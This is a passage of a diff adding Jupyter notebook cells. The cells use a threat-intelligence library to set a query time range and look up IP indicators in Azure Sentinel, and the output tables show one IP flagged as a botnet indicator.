+   "cell_type": "code",
+   "execution_count": 31,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-25T04:58:34.263895Z",
+     "start_time": "2019-09-25T04:58:34.222919Z"
+    },
+    "execution_event_id": "dd3239aa-89dc-46de-9ce2-75a23e53f5bd",
+    "last_executed_text": "q_times = nbwidgets.QueryTime(units=\"day\", auto_display=True)",
+    "persistent_id": "26b9e886-3fc7-4985-9873-7fa7c3a00cef"
+   },
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "27462cfd309147dfa42daaa50c0d9881",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": "VBox(children=(HTML(value='<h4>Set query time boundaries</h4>'), HBox(children=(DatePicker(value=datetime.date…"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "from datetime import datetime\r\n",
+    "search_origin = datetime.now()\r\n",
+    "q_times = nbwidgets.QueryTime(units=\"hour\", auto_display=True, origin_time=search_origin, max_after=24, max_before=24)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 32,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-25T04:58:36.693199Z",
+     "start_time": "2019-09-25T04:58:34.264895Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": "<div>\n<style scoped>\n    .dataframe tbody tr th:only-of-type {\n        vertical-align: middle;\n    }\n\n    .dataframe tbody tr th {\n        vertical-align: top;\n    }\n\n    .dataframe thead th {\n        text-align: right;\n    }\n</style>\n<table border=\"1\" class=\"dataframe\">\n  <thead>\n    <tr style=\"text-align: right;\">\n      <th></th>\n      <th>Ioc</th>\n      <th>IocType</th>\n      <th>QuerySubtype</th>\n      <th>Reference</th>\n      <th>Result</th>\n      <th>Status</th>\n      <th>Severity</th>\n      <th>Details</th>\n      <th>RawResult</th>\n      <th>Provider</th>\n    </tr>\n  </thead>\n  <tbody>\n    <tr>\n      <th>0</th>\n      <td>1.2.3.4</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-21T05:24:53.933864Z) | w...</td>\n      <td>False</td>\n      <td>0.0</td>\n      <td>0.0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>1</th>\n      <td>51.75.29.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-21T05:24:53.933864Z) | w...</td>\n      <td>False</td>\n      <td>0.0</td>\n      <td>0.0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>2</th>\n      <td>1.2.3.5</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-21T05:24:53.933864Z) | w...</td>\n      <td>False</td>\n      <td>0.0</td>\n      <td>0.0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>3</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-21T05:24:53.933864Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '2B3D1B719533D10EF42E0BA1948BDE099A83C38BAF53E8369CB9651A890A0CD2', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>4</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-21T05:24:53.933864Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '30196A288FA811E8ACCCC84C434E3AD15F175B17BE2D4458DD3BC660073C1365', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n  </tbody>\n</table>\n</div>",
+      "text/plain": "             Ioc IocType QuerySubtype  \\\n0        1.2.3.4    ipv4         None   \n1    51.75.29.61    ipv4         None   \n2        1.2.3.5    ipv4         None   \n3  109.236.89.61    ipv4         None   \n4  109.236.89.61    ipv4         None   \n\n                                                                                             Reference  \\\n0   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-21T05:24:53.933864Z) | w...   \n1   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-21T05:24:53.933864Z) | w...   \n2   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-21T05:24:53.933864Z) | w...   \n3   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-21T05:24:53.933864Z) | w...   \n4   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-21T05:24:53.933864Z) | w...   \n\n   Result  Status  Severity  \\\n0   False     0.0       0.0   \n1   False     0.0       0.0   \n2   False     0.0       0.0   \n3    True     0.0       2.0   \n4    True     0.0       2.0   \n\n                                                                                               Details  \\\n0                                                                                           Not found.   \n1                                                                                           Not found.   \n2                                                                                           Not found.   \n3  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n4  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n\n                                                                                             RawResult  \\\n0                                                                                                  NaN   \n1                                                                                                  NaN   \n2                                                                                                  NaN   \n3  {'IndicatorId': '2B3D1B719533D10EF42E0BA1948BDE099A83C38BAF53E8369CB9651A890A0CD2', 'TimeGenerat...   \n4  {'IndicatorId': '30196A288FA811E8ACCCC84C434E3AD15F175B17BE2D4458DD3BC660073C1365', 'TimeGenerat...   \n\n  Provider  \n0    AzSTI  \n1    AzSTI  \n2    AzSTI  \n3    AzSTI  \n4    AzSTI  "
+     },
+     "execution_count": 32,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Using this data range returned no results\n",
+    "ti_lookup.lookup_iocs(data=ioc_ips, providers=\"AzSTI\", start=q_times.start, end=q_times.end).head()"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 34,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-25T04:58:36.734209Z",
+     "start_time": "2019-09-25T04:58:36.694198Z"
+    },
+    "execution_event_id": "dd3239aa-89dc-46de-9ce2-75a23e53f5bd",
+    "last_executed_text": "q_times = nbwidgets.QueryTime(units=\"day\", auto_display=True)",
+    "persistent_id": "26b9e886-3fc7-4985-9873-7fa7c3a00cef"
+   },
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "f94868e27936401aa14d39fd667dee28",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": "VBox(children=(HTML(value='<h4>Set query time boundaries</h4>'), HBox(children=(DatePicker(value=datetime.date…"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "from datetime import datetime\r\n",
+    "search_origin = datetime.now()\r\n",
+    "q_times = nbwidgets.QueryTime(units=\"day\", auto_display=True, origin_time=search_origin, max_after=24, max_before=24)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 36,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-25T04:58:39.213273Z",
+     "start_time": "2019-09-25T04:58:36.735175Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": "<div>\n<style scoped>\n    .dataframe tbody tr th:only-of-type {\n        vertical-align: middle;\n    }\n\n    .dataframe tbody tr th {\n        vertical-align: top;\n    }\n\n    .dataframe thead th {\n        text-align: right;\n    }\n</style>\n<table border=\"1\" class=\"dataframe\">\n  <thead>\n    <tr style=\"text-align: right;\">\n      <th></th>\n      <th>Ioc</th>\n      <th>IocType</th>\n      <th>QuerySubtype</th>\n      <th>Reference</th>\n      <th>Result</th>\n      <th>Status</th>\n      <th>Severity</th>\n      <th>Details</th>\n      <th>RawResult</th>\n      <th>Provider</th>\n    </tr>\n  </thead>\n  <tbody>\n    <tr>\n      <th>0</th>\n      <td>1.2.3.4</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>False</td>\n      <td>0.0</td>\n      <td>0.0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>1</th>\n      <td>51.75.29.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>False</td>\n      <td>0.0</td>\n      <td>0.0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>2</th>\n      <td>1.2.3.5</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>False</td>\n      <td>0.0</td>\n      <td>0.0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>3</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '2E9C9B5884CE9D1AAECA21C5EB772C30C3C84093C452AA038868AD4EEF50E83E', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>4</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'AA38B8D61F8587B779AABF6C4F2DBD226C7704600A5CBBB7779A7D0E7AFA05C4', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>5</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'E9DD356FF6855D16952067E4A35F0AAA1A8FF4E955E20B249131BD0EF7115A1E', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>6</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '0612D0A787F9B2EA5FC1206C3727B3ADAD45D8AEDE2D90ADEC1C3B1590A609E0', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>7</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '4DDD4BC9AD3844756B4DF7FAB23E9E9B917124D0A257BB405EF5715DEAA3D61B', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>8</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'CAFF80F6C8FD64CDA73AE68E382C6A7B6C94CA257C897324E6DB78D8C2106588', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>9</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'C72FAFC4A20054F73B343418F5EBE887610D257FFD51439392CC0376AB3B7173', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>10</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '6E2A2B758395B8894E3B0D189870E155E0894D3801B951AE438D5C4A808F48E4', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>11</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '30196A288FA811E8ACCCC84C434E3AD15F175B17BE2D4458DD3BC660073C1365', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>12</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'E75DD2AC6D75085D6CC7F441B2AFB121D77422CA708C04923CEB74C0A6245DBA', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>13</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '12F46CB0B858952D8E9ABC29803373104673E7AD463AFA24C603B03CD8C14953', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>14</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '017D81A341E38E8355DA9EB6AAEE8AADC411ECE067DA84B586F59AC8EB3EDFAE', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>15</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'A973BDB744EF6FC429B19E346C2A8B5EB42DBC292EB37C0BBE4F2CCED98F5F9E', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>16</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '9570FF685A0289C703861F52B094C25A8D774570433A6562C85229A48DC826D3', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>17</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'D46F322358CB5FE7009A492564DD60C67E529A8439EA2B5F355385B9724F991C', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>18</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '874BD11D0EBF97F31A3ACC1E5A28B3DF637D4817BFBAAC59C25350DEC7C78185', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>19</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '7D0F24BEFB1FDFCE86BBE54EB05BAF62FAB93E5C0175E86EB6C5BF3F7E19AD23', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>20</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '0D2CC834B27D0EB8A4485B6B21295606F38B8DF06C0B2858D511157EE86AF219', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>21</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '7A9D9126C9B0F56B76B874E5C36ED807320A91E5A566E717F30C6022E8B77644', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>22</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'DDA218AD2568287384B6DD205ECA680D9CAFD5AE6B65B6821552AE11E12189D9', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>23</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '8A5D40A2674F98084398B2BFD97E33B39665F9B5FE98A485C1C149F363442679', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>24</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '4C007C39F6FEA5B88E1C456CB46929EAD4283B475689957EFF01C01395CE56A0', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>25</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'EA6FB2555F18DF5705C116F2BFFFF6F0AC23FE79CC1F70690CE696B15758F961', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>26</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '1238F3DBC455768842E6EB9D6601C4C98FDE6A390BBC97B78BE7240F33D5F2D9', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>27</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'AF4653DB24E9C45A116A6CD2B25D103D55A76457CEE9597205A3B3F4438F4CA1', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>28</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'C8133547D243769B2C38D4C2D03E90A14A340C7538BDAA21FE95BB2C906F350A', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>29</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '22E5A059B774EA99993C1C66A83F4001F8A238EF805D992782F6E84A4EA07066', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>30</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'C1D879AB9AF519E159684A8F592D5F8A035E7333A78BD612204ED0F1E1AE9DF4', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>31</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '57DA6DAC917CF91DCF7ADEFFBC8AE94EE839C09FFD4103742D54E05A4E608FFB', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>32</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '9C3E69D4268C0BF3A77C166C0F05BFF8D09B007B75D01517C7A76EBD1334F22A', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>33</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'E91D764D861739FAEF7B106ED830D247262CDA4F2A8B312F1172E74D10CFD995', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>34</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '066D608C45B2A7CD63AD0F3286B56917E410546F6DF9A1E3A7018DCE33F29F66', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>35</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 